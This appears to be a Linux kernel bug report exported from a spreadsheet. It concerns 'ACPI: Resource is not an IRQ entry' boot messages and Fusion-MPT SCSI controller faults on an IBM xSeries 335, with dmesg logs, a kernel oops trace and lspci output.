ioc0: Initiating recovery target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:1: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptscsih: ioc0: host reset: SUCCESS (sc=f7862e80) scsi 0:0:1:0: Device offlined - not ready after error recovery target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:2: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: attempting task abort! (sc=f7862e80) scsi 0:0:2:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=1: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! scsi 0:0:2:0: mptscsih: ioc0: completing cmds: fw_channel 0, fw_id 2, sc=f7862e80, mf = f7a63160, idx=19 mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: task abort: FAILED (sc=f7862e80) mptscsih: ioc0: attempting target reset! (sc=f7862e80) scsi 0:0:2:0: CDB: Inquiry: 12 00 00 00 24 00 target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:2: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: Issue of TaskMgmt failed! mptscsih: ioc0: target reset: FAILED (sc=f7862e80) mptscsih: ioc0: attempting bus reset! (sc=f7862e80) scsi 0:0:2:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=4: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: bus reset: FAILED (sc=f7862e80) mptscsih: ioc0: attempting host reset! (sc=f7862e80) mptbase: ioc0: Initiating recovery target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:2: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:2: mptspi: ioc0: dma_alloc_coherent for parameters failed mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptscsih: ioc0: host reset: SUCCESS (sc=f7862e80) scsi 0:0:2:0: Device offlined - not ready after error recovery target0:0:3: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:3: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:3: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:3: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: attempting task abort! (sc=f7862e80) scsi 0:0:3:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=1: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - This one I obtained it in 5 minutes in another boot with a very slightly differing .config file (not changing in the MPT Fusion options). You can see that the stack trace is slightly different. -------------------------------------------------------------------- ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! BUG: unable to handle kernel NULL pointer dereference at 0000034c IP: [&lt;f8856c5e&gt;] :mptspi:mptspi_dv_renegotiate_work+0xa/0x9f Oops: 0000 [#1] SMP Modules linked in: ide_pci_generic(+) floppy mptspi(+) mptscsih mptbase scsi_transport_spi ohci_hcd usbcore tg3 serverworks ide_core ata_generic libata scsi_mod dock thermal processor fan Pid: 9, comm: events/0 Not tainted (2.6.26-rc7 #3) EIP: 0060:[&lt;f8856c5e&gt;] EFLAGS: 00010282 CPU: 0 EIP is at mptspi_dv_renegotiate_work+0xa/0x9f [mptspi] EAX: f783f480 EBX: f7429900 ECX: f783f484 EDX: c1908548 ESI: f783f480 EDI: 0000034c EBP: f7429904 ESP: f7477f80 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process events/0 (pid: 9, ti=f7476000 task=f744d770 task.ti=f7476000) Stack: 00000000 c012cea5 f7429900 c1908544 f7429900 f783f480 f8856c54 f7429904 c012c82a f7429900 c012cee7 f742990c 00000000 c012cf9b 00000000 f744d770 c012f190 f7477fc4 f7477fc4 f7429900 c012cee7 00000000 c012f0cf c012f097 Call Trace: [&lt;c012cea5&gt;] queue_delayed_work_on+0x9a/0xa6 [&lt;f8856c54&gt;] mptspi_dv_renegotiate_work+0x0/0x9f [mptspi] [&lt;c012c82a&gt;] run_workqueue+0x6c/0xe4 [&lt;c012cee7&gt;] worker_thread+0x0/0xbf [&lt;c012cf9b&gt;] worker_thread+0xb4/0xbf [&lt;c012f190&gt;] autoremove_wake_function+0x0/0x2b [&lt;c012cee7&gt;] worker_thread+0x0/0xbf [&lt;c012f0cf&gt;] kthread+0x38/0x5d [&lt;c012f097&gt;] kthread+0x0/0x5d [&lt;c01043c3&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: 70 e8 9e f8 ff ff 8b 47 70 e8 44 37 ff ff 8b 47 70 5a 5b 5e 5f 5d e9 89 f8 ff ff 58 5b 5e 5f 5d c3 55 57 56 53 83 ec 10 8b 78 10 &lt;8b&gt; 2f e8 ff cc 90 c7 66 83 bf 96 02 00 00 00 8b 85 3c 01 00 00 EIP: [&lt;f8856c5e&gt;] mptspi_dv_renegotiate_work+0xa/0x9f [mptspi] SS:ESP 0068:f7477f80 ---[ end trace e7ec2a28a4a72094 ]--- mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT scsi0 : ioc0: LSI53C1030 B2, FwRev=01000e00h, Ports=1, MaxQ=222, IRQ=223 target0:0:0: mptspi: ioc0: dma_alloc_coherent for parameters failed hdc: ATAPI 24X CD-ROM drive, 128kB Cache Uniform CD-ROM driver Revision: 3.20 mptscsih: ioc0: attempting task abort! (sc=f7858e80) scsi 0:0:0:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=1: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h md: raid1 personality registered for level 1 device-mapper: ioctl: 4.13.0-ioctl (2007-10-18) initialised: dm-devel@redhat.com mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! scsi 0:0:0:0: mptscsih: ioc0: completing cmds: fw_channel 0, fw_id 0, sc=f7858e80, mf = f79e2da0, idx=f mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: task abort: FAILED (sc=f7858e80) mptscsih: ioc0: attempting target reset! (sc=f7858e80) scsi 0:0:0:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: Issue of TaskMgmt failed! mptscsih: ioc0: target reset: FAILED (sc=f7858e80) mptscsih: ioc0: attempting bus reset! (sc=f7858e80) scsi 0:0:0:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=4: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: bus reset: FAILED (sc=f7858e80) mptscsih: ioc0: attempting host reset! (sc=f7858e80) mptbase: ioc0: Initiating recovery mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptscsih: ioc0: host reset: SUCCESS (sc=f7858e80) scsi 0:0:0:0: Device offlined - not ready after error recovery target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: attempting task abort! (sc=f7858080) scsi 0:0:1:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=1: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! scsi 0:0:1:0: mptscsih: ioc0: completing cmds: fw_channel 0, fw_id 1, sc=f7858080, mf = f79e2f80, idx=14 mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: task abort: FAILED (sc=f7858080) mptscsih: ioc0: attempting target reset! (sc=f7858080) scsi 0:0:1:0: CDB: Inquiry: 12 00 00 00 24 00 target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:1: asynchronous target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: Issue of TaskMgmt failed! mptscsih: ioc0: target reset: FAILED (sc=f7858080) mptscsih: ioc0: attempting bus reset! (sc=f7858080) scsi 0:0:1:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=4: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: bus reset: FAILED (sc=f7858080) mptscsih: ioc0: attempting host reset! (sc=f7858080) mptbase: ioc0: Initiating recovery target0:0:1: mptspi: ioc0: dma_alloc_coherent for par</t>
  </si>
  <si>
    <t>2.6.25.10</t>
  </si>
  <si>
    <t>Error message: ACPI: Resource is not an IRQ entry</t>
  </si>
  <si>
    <t>2008-07-07 02:36 UTC</t>
  </si>
  <si>
    <t>2008-09-17 00:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown. 2.6.25 gives the error Distribution: Debian (but vanilla kernel) Hardware Environment: IBM xSeries 335 Software Environment: kernel (at boot) Problem Description: see below Steps to reproduce: see below ------- Detailed report: Kernel 2.6.25 (but probably many other kernels before this one) compiled for x86, give an error message at boot telling: ACPI: Resource is not an IRQ entry on a IBM xSeries 335 machine. After boot completes, it is possible to see this error and other suspicious strings using dmesg. Apparently the machine works, so I am unsure of how serious is this bug, that's why I have put Severity=Low. I am attaching the dmesg | grep -i acpi here, and then lspci -vvv below that one. Here is the "dmesg | grep -i acpi": ----------------------------------------------------------------- BIOS-e820: 000000003fffc180 - 0000000040000000 (ACPI data) ACPI: RSDP 000FDFC0, 0014 (r0 IBM ) ACPI: RSDT 3FFFFF80, 0030 (r1 IBM SERONYXP 1000 IBM 45444F43) ACPI: FACP 3FFFFF00, 0074 (r1 IBM SERONYXP 1000 IBM 45444F43) ACPI: DSDT 3FFFC180, 3BB6 (r1 IBM SERTURQU 1000 MSFT 100000B) ACPI: FACS 3FFFFE40, 0040 ACPI: APIC 3FFFFE80, 0076 (r1 IBM SERONYXP 1000 IBM 45444F43) ACPI: ASF! 3FFFFDC0, 004B (r16 IBM SERONYXP 1 IBM 45444F43) ACPI: PM-Timer IO Port: 0x488 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) ACPI: LAPIC (acpi_id[0x01] lapic_id[0x06] enabled) ACPI: LAPIC_NMI (acpi_id[0x00] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x06] dfl dfl lint[0x1]) ACPI: IOAPIC (id[0x0e] address[0xfec00000] gsi_base[0]) ACPI: IOAPIC (id[0x0d] address[0xfec01000] gsi_base[16]) ACPI: IOAPIC (id[0x0c] address[0xfec02000] gsi_base[32]) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ3 used by override. Using ACPI (MADT) for SMP configuration information ACPI: Core revision 20070126 ACPI: bus type pci registered ACPI: EC: Look up EC in DSDT ACPI: Interpreter enabled ACPI: (supports S0 S5) ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Root Bridge [PCI1] (0000:01) ACPI: PCI Interrupt Routing Table [\_SB_.PCI1._PRT] ACPI: PCI Root Bridge [PCI2] (0000:02) ACPI: PCI Interrupt Routing Table [\_SB_.PCI2._PRT] ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP00] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP01] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP02] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP03] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP04] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP05] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP06] (IRQs *9) ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP07] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP08] (IRQs *10) ACPI: PCI Interrupt Link [LP09] (IRQs *11) ACPI: PCI Interrupt Link [LP0A] (IRQs *10) ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP0B] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP0C] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP0D] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP0E] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP0F] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP10] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP11] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP12] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP13] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP14] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP15] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP16] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP17] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP18] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP19] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP1A] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP1B] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP1C] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP1D] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP1E] (IRQs) *0, disabled. ACPI: Blank IRQ resource ACPI: Resource is not an IRQ entry ACPI: PCI Interrupt Link [LP1F] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LPUS] (IRQs *11) pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 14 devices ACPI: ACPI bus type pnp unregistered PnPBIOS: Disabled by ACPI PNP PCI: Using ACPI for IRQ routing ACPI: ACPI0007:00 is registered as cooling_device0 ACPI: ACPI0007:01 is registered as cooling_device1 ACPI: PCI Interrupt Link [LPUS] enabled at IRQ 11 ACPI: PCI Interrupt 0000:00:0f.2[A] -&gt; Link [LPUS] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt 0000:01:01.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 22 ACPI: PCI Interrupt 0000:02:01.0[A] -&gt; GSI 24 (level, low) -&gt; IRQ 24 ACPI: PCI Interrupt 0000:02:02.0[A] -&gt; GSI 25 (level, low) -&gt; IRQ 25 ACPI: Power Button (FF) [PWRF] ----------------------------------------------------------------- Here is the lspci -vvv: ----------------------------------------------------------------- 00:00.0 Host bridge: Broadcom CMIC-WS Host Bridge (GC-LE chipset) (rev 13) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Kernel modules: sworks-agp 00:00.1 Host bridge: Broadcom CMIC-WS Host Bridge (GC-LE chipset) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Kernel modules: sworks-agp 00:00.2 Host bridge: Broadcom CMIC-LE Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Kernel modules: sworks-agp 00:01.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) (prog-if 00 [VGA controller]) Subsystem: IBM Unknown device 0240 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (2000ns min), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at fd000000 (32-bit, non-prefetchable) [size=16M] Region 1: I/O ports at 2200 [size=256] Region 2: Memory at febff000 (32-bit, non-prefetchable) [size=4K] Capabilities: [5c] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0f.0 Host bridge: Broadcom CSB5 South Bridge (rev 93) Subsystem: Broadcom CSB5 South Bridge Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 64 Kernel driver in use: piix4_smbus Kernel modules: sworks-agp, i2c-piix4 00:0f.1 IDE interface: Broadcom CSB5 IDE Controller (rev 93) (prog-if 8a [Master SecP PriP]) Subsystem: Broadcom CSB5 IDE Controller Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 32 bytes Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 0700 [size=16] Kernel driver in use: Serverworks_IDE Kernel modules: serverworks 00:0f.2 USB Controller: Broadcom OSB4/CSB5 OHCI USB Controller (rev 05) (prog-if 10 [OHCI]) Subsystem: Broadcom OSB4/CSB5 OHCI USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (20000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 11 Region 0: Memory at febfe000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd Kernel modules: ohci-hcd 00:0f.3 ISA bridge: Broadcom CSB5 LPC bridge Subsystem: Broadcom Unknown device 0230 Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:11.0 Host bridge: Broadcom CIOB-X2 PCI-X I/O Bridge (rev 03) Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Capabilities: [60] PCI-X non-bridge device Command: DPERE- ERO- RBC=512 OST=8 Status: Dev=00:00.0 64bit+ 133MHz+ SCD+ USC+ DC=bridge DMMRBC=512 DMOST=8 DMCRS=8 RSCEM- 266MHz- 533MHz- Kernel modules: sworks-agp 00:11.2 Host bridge: Broadcom CIOB-X2 PCI-X I/O Bridge (rev 03) Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Capabilities: [60] PCI-X non-bridge device Command: DPERE- ERO- RBC=512 OST=8 Status: Dev=00:00.0 64bit+ 133MHz+ SCD- USC- DC=bridge DMMRBC=512 DMOST=8 DMCRS=8 RSCEM- 266MHz- 533MHz- Kernel modules: sworks-agp 01:01.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 07) Subsystem: IBM Unknown device 026d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 72 (4250ns min, 4500ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 22 Region 0: I/O ports at 2300 [size=256] Region 1: Memory at fbff0000 (64-bit, non-prefetchable) [size=64K] Region 3: Memory at fbfe0000 (64-bit, non-prefetchable) [size=64K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [68] PCI-X non-bridge device Command: DPERE- ERO- RBC=512 OST=1 Status: Dev=01:01.0 64bit+ 133MHz+ SCD- USC- DC=simple DMMRBC=2048 DMOST=8 DMCRS=16 RSCEM- 266MHz- 533MHz- Kernel driver in use: mptspi Kernel modules: mptspi 02:01.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet (rev 02) Subsystem: IBM Unknown device 026f Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (16000ns min), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 24 Region 0: Memory at f9ff0000 (64-bit, non-prefetchable) [size=64K] Capabilities: [40] PCI-X non-bridge device Command: DPERE- ERO- RBC=2048 OST=1 Status: Dev=02:01.1 64bit+ 133MHz+ SCD- USC- DC=simple DMMRBC=2048 DMOST=1 DMCRS=16 RSCEM- 266MHz- 533MHz- Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data &lt;?&gt; Capabilities: [58] Message Signalled Interrupts: Mask- 64bit+ Queue=0/3 Enable- Address: 0000000100000000 Data: e6d7 Kernel driver in use: tg3 Kernel modules: tg3 02:02.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet (rev 02) Subsystem: IBM Unknown device 026f Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (16000ns min), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 25 Region 0: Memory at f9fe0000 (64-bit, non-prefetchable) [size=64K] Capabilities: [40] PCI-X non-bridge device Command: DPERE- ERO- RBC=2048 OST=1 Status: Dev=02:02.1 64bit+ 